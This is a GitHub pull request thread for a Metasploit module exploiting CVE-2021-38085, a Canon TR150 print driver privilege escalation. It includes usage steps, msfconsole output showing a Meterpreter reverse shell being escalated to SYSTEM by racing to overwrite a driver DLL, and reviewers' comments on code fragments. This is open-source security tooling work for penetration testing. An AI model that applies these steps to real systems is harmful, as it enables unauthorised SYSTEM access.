Canon TR150 Print Driver Local Privilege Escalation
rapid7/metasploit-framework pull request #15520
Opened 2021-08-05 21:19 UTC by jacob-baines

This pull request is for [CVE-2021-38085](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085), an unpatched privilege escalation issue in the Canon TR150 Print Driver. I promised this module in my DEFCON talk, [Bring Your Own Print Driver Vulnerability](https://www.youtube.com/watch?v=vdesswZYz-8). In that talk, I demonstrate that low privileged users can install arbitrary drivers, so having vulnerable drivers in your back pocket is quite nice. This module does not interface with an evil printer, but it will escalate to SYSTEM if the driver is present.

The pull request is very much modeled after @space-r7's [Ricoh privilege escalation module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ricoh_driver_privesc.rb)... to the point that they are credited in the module. Like the Ricoh module, this module races to overwrite a DLL and isn't always successful. When generating the verification / documentation, the module landed the first time, but that shouldn't be the expectation.

## Verification

List the steps needed to make sure this thing works

- [ ] Install attached Lexmark driver and add a printer using the driver.
- [ ] Start `msfconsole`
- [ ] Get a session with basic privileges
- [ ] Do: ```use exploit/windows/local/canon_driver_privesc```
- [ ] Do: ```set SESSION <sess_no>```
- [ ] Configure payload
- [ ] Do: ```run```
- [ ] You should get a shell running as SYSTEM.

## Example Output
Here is example output (also included in documentation):

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.0.8:1270 
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400
meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/canon_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/canon_driver_privesc) > run
[*] Started reverse TCP handler on 10.0.0.8:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon driver directory has full permissions
[*] Dropping bat to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[*] Adding printer ePzTcgz...
[*] Sending stage (200262 bytes) to 10.0.0.7
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400
[*] Deleting printer ePzTcgz
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > quit
[*] Shutting down Meterpreter...
```

Vulnerable driver:
[TR1506.zip](https://github.com/rapid7/metasploit-framework/files/6941733/TR1506.zip)

2021-08-06 17:45 UTC, smcintyre-r7 requested changes, later dismissed

2021-08-06 17:45 UTC, smcintyre-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    Rex.sleep(3)
It should be safe to just use `sleep` here, I'm not sure why the original module used Rex. [Both paths](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex.rb#L101) wind up at `Rex::ThreadSafe.sleep`.

2021-08-06 17:45 UTC, smcintyre-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
Seems like this should be using `fail_with` to prevent the module from continuing to run.

2021-08-06 17:45 UTC, smcintyre-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })
Instead of using the Meterpreter API directly, you can simply call `cmd_exec(script_cmd)`. Hidden will be set for you already, along with Channelized and Subshell but this can be disabled through the opts if you need them turned off.

Also because you need it run in `cmd.exe /c`, `cmd_exec` should handle that for you by automatically executing it within a subshell.

2021-08-06 17:45 UTC, smcintyre-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +## Vulnerable Application
We have a `msftidy_docs.rb` tool to lint the markdown docs. If you wouldn't mind, could you please address its comments:
```
tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/canon_driver_privesc.md  
documentation/modules/exploit/windows/local/canon_driver_privesc.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/windows/local/canon_driver_privesc.md:27 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/canon_driver_privesc.md:28 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/canon_driver_privesc.md:29 - [WARNING] Should use single backquotes (`) for single line literals instead of triple backquotes (```)
documentation/modules/exploit/windows/local/canon_driver_privesc.md:36 - [WARNING] Code blocks using triple backquotes (```) should not be indented
documentation/modules/exploit/windows/local/canon_driver_privesc.md:96 - [WARNING] Code blocks using triple backquotes (```) should not be indented
```

The other thing is that each of the sections are indented when they don't need to be.

2021-08-07 10:58 UTC, jacob-baines commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })
I *believe* `cmd_exec` doesn't return until the command has completed though? And `client.sys.process.execute` does not block (it returns immediately). We need the bat file to run during the add printer logic below. Thoughts?

2021-08-09 02:52 UTC, gwillcox-r7 requested changes
Overall looks pretty good but I did have a few suggestions for improvement and then one or two areas where I did have a bit of concern r.e explanations and potential cases where we should be doing things a little different. Let me know if you have any questions and keep in mind that I can also make most of these changes myself if you are happy with them, don't want to take up your time if your busy 👍

2021-08-09 02:52 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
Question but considering all the other areas have `\"` in this document, is there a reason `find "a"` isn't `find \"a\"`?. I also question if this needed given the heredoc format.

2021-08-09 02:52 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    write_file(temp_path, dll_data)
Should probably output another `print_status` here or `vprint_status` as otherwise its going to be hard to tell which `write_file` line failed if there is an issue, and its also useful to tell the user you are dropping a file in case it doesn't get cleaned up correctly, similar to what you did with `bat_file_path`.

2021-08-09 16:33 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/0e41a0e81ee7548d46eceec22a1f5e9d8e531a2e

2021-08-09 16:33 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    Rex.sleep(3)
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/0e41a0e81ee7548d46eceec22a1f5e9d8e531a2e

2021-08-09 16:35 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    drvr_name = 'Canon TR150 series'
This is similar to a previous discussion we had and I think we determined this has to be this set value so I'm going to close this issue as resolved.

2021-08-09 16:42 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +## Vulnerable Application
This should now be resolved with https://github.com/rapid7/metasploit-framework/pull/15520/commits/7703810c4afa6ee685e38d04c7ce29f6f0379aa6

2021-08-09 16:44 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    self.needs_cleanup = true
Nm as noted by Spencer at https://github.com/rapid7/metasploit-framework/pull/15519#discussion_r684401749 this option is needed. Marking as resolved.

2021-08-09 16:51 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    return CheckCode::Detected('Canon driver directory does not have full permissions') unless vulnerable
I've changed this line to the following, let me know if this makes sense: `return CheckCode::Safe('Canon LanguageModules\\040C directory does not exist or does not grant Users full permissions') unless vulnerable`

2021-08-09 17:10 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
Yeah looking at this it isn't needed, see the following example:

```
2.7.2 :002"> bat_file = <<~HEREDOC
2.7.2 :003"> "adsf"
2.7.2 :004 > HEREDOC
 => "\"adsf\"\n" 
2.7.2 :005"> bat_file = <<~HEREDOC
2.7.2 :006"> \"adsf\"
2.7.2 :007 > HEREDOC
 => "\"adsf\"\n" 
2.7.2 :008 > 
```
In both cases we still get the same output.

2021-08-09 17:12 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
Sorry that was actually a bad example but here is another case just to show what I meant:

```
2.7.2 :009"> bat_file = <<~HEREDOC
2.7.2 :010"> "#{a}"
2.7.2 :011 > HEREDOC
 => "\"psdf\"\n" 
2.7.2 :012"> bat_file = <<~HEREDOC
2.7.2 :013"> \"#{a}\"
2.7.2 :014 > HEREDOC
 => "\"psdf\"\n" 
2.7.2 :015 > 
```

2021-08-09 17:24 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:24 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:25 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    CheckCode::Appears('Canon driver directory has full permissions')
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:25 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +
Fixed with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:25 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +
Fixed with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:26 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +7. You should get a shell running as SYSTEM.
Fixed with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:26 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +below allow escalation of privileges on Windows systems.
Reworded with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:26 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +printer with a vulnerable driver.
Reworded with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +to add and delete printers. Multiple runs of this
Reworded with https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 17:27 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    write_file(temp_path, dll_data)
Not sure why GitHub is saying this wasn't fixed but it was fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/f8d838bba23c787580f98789207c911917cba242

2021-08-09 18:24 UTC, gwillcox-r7 commented
@jacob-baines Also as a related note this PR and your other related PR don't have instructions on how to actually install the affected driver. The `CAB` files you provided do not seem to install on Windows 10 cleanly from what I can tell, and it seems like version 1.00 listed at https://www.usa.canon.com/internet/portal/us/home/support/details/printers/mobile-compact-printer/pixma-tr150 is the official installer, with version 1.01 patch being the official patch.

2021-08-09 18:29 UTC, jacob-baines commented
@gwillcox-r7 Sorry! Use 7zip or expand.exe to explode the cab file then just right click on the .inf within and select install. Here's an example of suing expand from my poc:

https://github.com/jacob-baines/concealed_position/blob/main/src/cp_server/main.cpp#L120

2021-08-09 18:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +`C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll`
technically we overwrite this DLL, might want to reword this.

2021-08-09 18:38 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK ],
Might be good to add CONFIG_CHANGES given that we overwrite one of the DLLs and don't restore it.

2021-08-09 18:41 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
This fails on my Windows 10 machine as the string is `BUILTIN\Users:(I)(OI)(CI)(F)`, which means we have an extra `(I)` in the string. Probably better to change this to a regex.

2021-08-09 18:42 UTC, jacob-baines commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
I'm going to switch this over to pnputil as well.

2021-08-09 19:20 UTC, gwillcox-r7 commented
@jacob-baines Alright so I used the install file from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN to test this out and it works fine. I can upload the updated documentation and regex, though if we switch it over to `pnputil` I imagine the regex will need to change as well.

2021-08-09 19:23 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/canon_driver_privesc.md
> +`C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll`
Fixed wording in https://github.com/rapid7/metasploit-framework/pull/15520/commits/55404ff29feb0e68e143778f20fe520c72243633

2021-08-09 19:24 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    return CheckCode::Detected('Detected Canon driver directory, but no language files') unless language_dirs.length
Fixed wording with https://github.com/rapid7/metasploit-framework/pull/15520/commits/55404ff29feb0e68e143778f20fe520c72243633

2021-08-09 19:25 UTC, gwillcox-r7 commented
Alright I've done my edits on this for now and also included an example from my side in the documentation of this working with the driver from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN. I'll leave you to make the edits r.e the `pnputil` edit and then I'll be happy to retest this again and at that point if everything is good we should be able to land this.

2021-08-10 18:26 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
Hmm so looks like `pnputil` isn't being having the driver version number updated when the patch is applied. Also the original check isn't working either. Going to have to come up with some better way of detecting vulnerable versions.

2021-08-10 18:42 UTC, jacob-baines commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
Unless Canon has released something since last week, there is no patch for this.

2021-08-10 20:02 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
@jacob-baines Ah okay so Windows Printers and Multifunction Printers security patch Ver.1.0.1 from https://www.usa.canon.com/internet/portal/us/home/support/details/printers/mobile-compact-printer/pixma-tr150 shouldn't fix this then? Cause it seemed to not work for me after installing that patch but I didn't see the version number being bumped.

2021-08-10 20:37 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
Looks like installing that patch changes the `C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C` directory permissions in my tests. Readding the printer doesn't help things.

2021-08-10 20:40 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
Going to land this and keep the current check as it seems appropriate from my experience.

2021-08-10 20:40 UTC, gwillcox-r7 approved these changes

2021-08-10 20:52 UTC, jacob-baines commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
👍 I'll give it a deeper looker. Could be I made a mistake on my initial analysis.

2021-08-10 20:52 UTC, gwillcox-r7 commented on modules/exploits/windows/local/canon_driver_privesc.rb
> +    client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })
After further discussion with Spencer, we both agreed that the current code is correct and `cmd_exec` wouldn't make sense due to it requiring the command to finish executing before it will return. So yes you are correct @jacob-baines, looks like `client.sys.process.execute()` call here is needed.

2021-08-10 21:10 UTC, merged

2021-08-10 21:11 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the `SYSTEM` user.